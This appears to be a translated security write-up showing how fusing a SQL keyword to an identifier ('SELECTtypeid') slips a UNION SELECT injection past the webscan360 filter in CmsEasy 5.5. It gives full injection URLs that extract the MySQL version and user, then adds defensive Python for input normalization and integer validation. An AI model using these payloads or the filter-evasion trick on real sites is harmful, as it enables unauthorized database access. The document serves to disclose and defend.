A MySQL parsing quirk bypasses webscan360 and lets the injected SQL execute perfectly

Here we need to talk about the latest version of CmsEasy. First, let us test one thing. In MySQL, everyone will agree that select tname,1,2,3,4 from table can be executed. Now remove the space between select and tname and see whether the statement still executes. We test it against the CmsEasy database: SELECTcatid FROM cmseasy_archive WHERE 1

[screenshot: result of the SELECTcatid query]

See that? It executed perfectly. When auditing CmsEasy earlier, the first attempt, union select 1,2,3,4 from t, was automatically blocked by webscan360. The second attempt, union select/**/1,2,3,4 from t, bypassed webscan360 and executed successfully. The third time around, that previous webscan360 bypass had been patched: retesting the second form now gets blocked, so we will not demonstrate it. So is our guess correct, and should union selecttname,1,2,3,4 from t also execute? Let us look straight at the code, archive_act.php:

    } elseif (front::get(front::check_type('aid'))) {
        // archive_act.php (CmsEasy): aid is passed through check_type() before use
        $this->view->archive = archive::getInstance()->getrow(front::get('aid'));
        $this->view->categorys = category::getpositionlink2($this->view->archive['catid']);
        $this->view->paylist = pay::getInstance()->getrows('', 50);
        $this->view->logisticslist = logistics::getInstance()->getrows('', 50);
        $prices = getPrices($this->view->archive['attr2']);
        $this->view->archive['attr2'] = $prices['price'];
        if (!is_array($this->view->archive))
            $this->out('message/error.html');
        if ($this->view->archive['checked'] < 1)
            exit(lang('未审核!'));
        if (!rank::arcget(front::get('aid'), $this->view->usergroupid)) {
            $this->out('message/error.html');
        }


Here front::get(front::check_type('aid')) is now sanitized, so the vulnerability itself has been patched. What we want to test is webscan360, so we skip this logic and change the condition to:

    } elseif (true || front::get(front::check_type('aid'))) {
        // test-only change: short-circuit the check so the raw aid reaches the query
        $this->view->archive = archive::getInstance()->getrow(front::get('aid'));
        $this->view->categorys = category::getpositionlink2($this->view->archive['catid']);


We request the URL: **.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1

[screenshot: response to the SELECT/**/ request]

Then we request the URL: **.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECTtypeid,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1

[screenshot: response to the SELECTtypeid request]

Bypassed successfully!
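The three observations above (a spaced UNION SELECT is blocked, a /**/ comment slips through, and a keyword fused to an identifier slips through) all point at the same weakness in a signature that insists on whitespace around SELECT. The Python below is an added example written for this page; it is not code from the post, from webscan360 or from CmsEasy. The NAIVE_SIG and HARDENED_SIG regexes are illustrative assumptions about how such a signature might be written, the sample values are constructed, and validate_aid is a hypothetical helper standing in for the kind of check the post says check_type('aid') now performs, not CmsEasy's actual function. It shows why decoding and comment-stripping must happen before matching, and why the real fix is typing the parameter in the application rather than relying on the WAF.

```python
import re
import urllib.parse
from typing import Optional

# Constructed sample parameter values (not captured traffic): the three payload
# shapes the post describes, one percent-encoded the way it appears in a URL,
# and a benign article id.
SAMPLES = {
    "spaced":  "1 UNION SELECT 1,2,3,4 from t",
    "comment": "1 UNION SELECT/**/1,2,3,4 from t",
    "fused":   "1 UNION SELECTtypeid,2,3,4 from t",
    "encoded": "1%20UNION%20SELECT/**/1,2,3,4%20from%20t",
    "benign":  "42",
}

# A naive signature of the kind the post's observations suggest (assumption):
# it requires whitespace on both sides of SELECT, so a comment, a fused
# identifier, or plain percent-encoding slips past it.
NAIVE_SIG = re.compile(r"\bunion\s+select\s", re.IGNORECASE)


def naive_flags(value: str) -> bool:
    """True if the naive signature matches the raw (undecoded) parameter value."""
    return NAIVE_SIG.search(value) is not None


def normalize(value: str) -> str:
    """Canonicalize a parameter value before matching:
    percent-decode so %20 / %60 cannot hide tokens, replace /* ... */ comments
    with a space because MySQL treats them as whitespace, then collapse
    whitespace runs and lower-case.
    """
    text = urllib.parse.unquote(value)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    text = re.sub(r"\s+", " ", text)
    return text.lower()


# Hardened signature (assumption): optional whitespace between the keywords and
# no boundary after SELECT, so "SELECTtypeid" counts as keyword-adjacent rather
# than as a harmless identifier.
HARDENED_SIG = re.compile(r"\bunion\b\s*select")


def hardened_flags(value: str) -> bool:
    """True if the normalized value contains a UNION ... SELECT pattern."""
    return HARDENED_SIG.search(normalize(value)) is not None


def validate_aid(value) -> Optional[int]:
    """Application-side fix (hypothetical helper, not CmsEasy's check_type()):
    an article id is a positive integer or it is rejected outright.
    Returning None instead of a "cleaned" string forces the caller to decide
    explicitly, and nothing but digits ever reaches the SQL layer.
    """
    if not isinstance(value, str) or re.fullmatch(r"[1-9][0-9]{0,9}", value) is None:
        return None
    return int(value)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:8} naive={naive_flags(sample)!s:5} hardened={hardened_flags(sample)}")
    print("validate_aid('42') ->", validate_aid("42"))
    print("validate_aid(payload) ->", validate_aid(SAMPLES["fused"]))
```

Running it shows the naive signature catching only the spaced form while the hardened one flags all four attack shapes. The hardened regex will also match harmless text such as "union selection", which is the usual trade-off of signature matching on free-form input; that is why validate_aid, which rejects anything that is not a small positive integer, is the control that actually closes the hole, and the WAF rule is defense in depth.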
